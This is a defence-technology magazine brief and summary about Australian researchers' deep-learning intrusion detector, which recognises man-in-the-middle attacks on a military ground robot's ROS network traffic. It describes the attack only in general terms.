New Cyber Algorithm Shuts Down Malicious Robotic Attacks

Safe and secure operations of robotic systems are of paramount importance. Aiming for achieving the trusted operation of a military robotic vehicle under contested environments, we introduce a new cyber-physical system based on the concepts of deep learning convolutional neural networks (CNNs).

The GVR-BOt used in the experiment by UniSA and Charles Sturt AI researchers. (Image: UniSA.)

Australian researchers have designed an algorithm that can intercept a man-in-the-middle (MitM) cyberattack on an unmanned military robot and shut it down in seconds.

In an experiment using deep learning neural networks to simulate the behavior of the human brain, artificial intelligence experts from Charles Sturt University and the University of South Australia (UniSA) trained the robot’s operating system to learn the signature of a MitM eavesdropping cyberattack. This is where attackers interrupt an existing conversation or data transfer.

The algorithm, tested in real time on a replica of a U.S. Army combat ground vehicle, was 99 percent successful in preventing a malicious attack. False positive rates of less than 2 percent validated the system, demonstrating its effectiveness.

The results have been published in IEEE Transactions on Dependable and Secure Computing.

UniSA autonomous systems researcher, Professor Anthony Finn, says the proposed algorithm performs better than other recognition techniques used around the world to detect cyberattacks.

Professor Finn and Dr. Fendy Santoso from Charles Sturt Artificial Intelligence and Cyber Futures Institute collaborated with the U.S. Army Futures Command to replicate a man-in-the-middle cyberattack on a GVT-BOT ground vehicle and trained its operating system to recognize an attack.

“The robot operating system (ROS) is extremely susceptible to data breaches and electronic hijacking because it is so highly networked,” Prof Finn says.

“The advent of Industry 4, marked by the evolution in robotics, automation, and the Internet of Things, has demanded that robots work collaboratively, where sensors, actuators and controllers need to communicate and exchange information with one another via cloud services.

“The downside of this is that it makes them highly vulnerable to cyberattacks.

“The good news, however, is that the speed of computing doubles every couple of years, and it is now possible to develop and implement sophisticated AI algorithms to guard systems against digital attacks.”

Dr. Santoso says despite its tremendous benefits and widespread usage, the robot operating system largely ignores security issues in its coding scheme due to encrypted network traffic data and limited integrity-checking capability.

“Owing to the benefits of deep learning, our intrusion detection framework is robust and highly accurate,” Dr. Santoso says. “The system can handle large datasets suitable to safeguard large-scale and realtime data-driven systems such as ROS.”

Professor Finn and Dr. Santoso plan to test their intrusion detection algorithm on different robotic platforms, such as drones, whose dynamics are faster and more complex compared to a ground robot.

This work was performed by Anthony Finn and Fendy Santoso for the Defence and Systems Institute (DASI), University of South Australia (Adelaide, Australia). For more information, download the Technical Support Package (free white paper) below. TSP-04244



This Brief includes a Technical Support Package (TSP).
Document cover
Trusted Operations of a Military Ground Robot in the Face of Man-in-the-Middle Cyberattacks Using Deep Learning Convolutional Neural Networks: Real-Time Experimental Outcomes

(reference TSP-04244) is currently available for download from the TSP library.

Don't have an account?



Magazine cover
Aerospace & Defense Technology Magazine

This article first appeared in the April, 2024 issue of Aerospace & Defense Technology Magazine (Vol. 9 No. 2).

Read more articles from this issue here.

Read more articles from the archives here.


Overview

The document discusses research focused on enhancing the cybersecurity of unmanned ground vehicles (UGVs), specifically targeting vulnerabilities within the Robot Operating System (ROS). The study highlights the risks posed by cyber-attacks, particularly man-in-the-middle attacks, which can compromise the control and operation of robotic systems.

The research utilizes a ground robot, the GVR-BOT, to conduct real-time penetration testing, simulating cyber-attacks to assess the system's vulnerabilities. The findings reveal that during a cyber-attack, the robot becomes unresponsive to legitimate command signals, as the guidance data is overwritten by malicious traffic. This scenario illustrates how attackers can manipulate the system's trajectory by injecting false data, rendering the robot "blind" to its intended commands.

To address these vulnerabilities, the researchers developed a convolutional neural network (CNN) designed to detect cyber-attacks by analyzing ROS network traffic data. The data collected during both legitimate operations and attacks were transformed into images (grayscale or RGB) to train the CNN, enabling it to learn the signatures of various attacks. The study emphasizes the importance of real-time detection capabilities to mitigate risks associated with cyber threats.

The document also outlines the hardware configuration of the GVR-BOT, which includes an Intel Atom processor, WiFi communication system, and optional GPS capabilities. The robot is designed for both indoor and outdoor environments, capable of performing various motions, which adds complexity to its operational context.

In addition to the technical aspects, the research discusses the broader implications of trust in robotic systems, emphasizing that despite the best efforts to ensure dependability, there are inherent risks when delegating tasks to autonomous agents. The study is supported by various military and academic institutions, highlighting its relevance to defense applications.

Overall, the document presents a comprehensive approach to improving the security of robotic systems through advanced machine learning techniques, aiming to create a safer operational environment for UGVs in contested scenarios. The findings contribute to the ongoing discourse on trusted autonomy and the need for robust cybersecurity measures in robotics.